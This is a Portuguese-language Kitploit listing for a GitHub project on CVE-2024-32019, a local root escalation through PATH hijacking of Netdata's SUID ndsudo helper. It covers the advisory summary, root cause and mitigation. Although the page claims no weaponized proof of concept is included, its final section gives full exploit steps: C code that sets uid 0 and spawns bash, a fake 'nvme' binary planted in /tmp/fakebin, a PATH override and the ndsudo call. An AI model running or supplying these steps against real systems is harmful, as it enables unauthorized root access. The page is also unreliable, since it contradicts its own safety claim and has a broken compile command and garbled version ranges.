Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-32019-PoC — Verifica a exposição à escalada de privilégios do SUID PATH do Netdata ndsudo para CVE-2024-32019 e valida patches sem exploração weaponizada. | Kitploit
Ferramentas/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Ferramentas DefensivasEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoVirtualização para SegurançaTestes de Penetração
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Verifica a exposição à escalada de privilégios do SUID PATH do Netdata ndsudo para CVE-2024-32019 e valida patches sem exploração weaponizada.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32019 — Escalação de Privilégios Local no ndsudo do Netdata

Resumo

O helper ndsudo do Netdata (instalado com setuid root) restringe quais comandos irá executar, mas resolve esses comandos usando o PATH do chamador. Em versões afetadas, um usuário local pode colocar um binário malicioso no início do PATH e fazer com que o ndsudo o execute com privilégios de root. Corrigido no Netdata 1.45.3 e 1.45.0-169.

Afetado / Corrigido

  • Afetado: >= 1.44.0-60, < 1.45.0-169 e (conforme o aviso upstream).

>= 1.45.0, < 1.45.3
  • Corrigido: 1.45.3 (estável), 1.45.0-169 (nightly). GitHub

  • Impacto

    Escalação de privilégios local para root em sistemas onde o ndsudo está instalado com SUID e o usuário pode invocá-lo (comumente membros do grupo netdata). NVDGitHub

    Causa Raiz (visão geral)

    • O ndsudo é SUID-root e permite uma lista de subcomandos como nvme-list, nvme-smart-log, etc.

    • Ele chama executáveis externos pelo nome (por exemplo, nvme), que são resolvidos via PATH em vez de usar caminhos absolutos ou uma busca segura e fixa.

    • Se um diretório gravável aparecer antes dos caminhos do sistema, um atacante pode introduzir um binário semelhante que será executado como root. GitHub

    Reprodução / Verificação Segura

    Este repositório inclui verificadores não-exploit que:

    • Inspecionam /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (ou onde estiver instalado) quanto a SUID/propriedade.

    • Enumeram o PATH em busca de diretórios graváveis anteriores aos caminhos comuns do sistema.

    • Confirmam a presença de nomes de subcomandos permitidos que o ndsudo pode tentar executar.

    • Opcionalmente executam ndsudo --test <subcommand> para imprimir o comando resolvido sem executá-lo (use com cautela, leia o código primeiro). GitHub

    ⚠️ Nenhum PoC weaponizado está incluído. Este projeto é para defensores e pesquisadores avaliarem a exposição e validarem patches de forma responsável.

    Mitigação

    • Atualize o Netdata para 1.45.3 (estável) ou 1.45.0-169 (nightly).

    • Como medida de defesa em profundidade, prefira caminhos absolutos ou um PATH mínimo sanitizado em helpers SUID; evite conceder acesso desnecessário ao ndsudo. GitHubwiz.io

    Passos do Exploit

    1. Salve o seguinte código C como nvme.c:
    root@kitploit:~
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    
    2. Compile o Exploit
    root@kitploit:~
    gcc nvme.c - nvme
    
    3. Configuração do Ambiente
    root@kitploit:~
    mkdir -p /tmp/fakebin
    mv nvme /tmp/fakebin/
    chmod +x /tmp/fakebin/nvme
    
    4. Modifique o PATH
    root@kitploit:~
    export PATH=/tmp/fakebin:$PATH
    
    5. Comando do Exploit
    root@kitploit:~
    /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

    Referências

    • NVD: CVE-2024-32019. NVD

    • Aviso do Netdata (GHSA-pmhq-4cxq-wj93). GitHub

    • Resumo da Wiz. wiz.io

    • Artigo da Snyk. Vulnerability Guide

    • Listagem MITRE/CVE. CVE

    Baixar ferramenta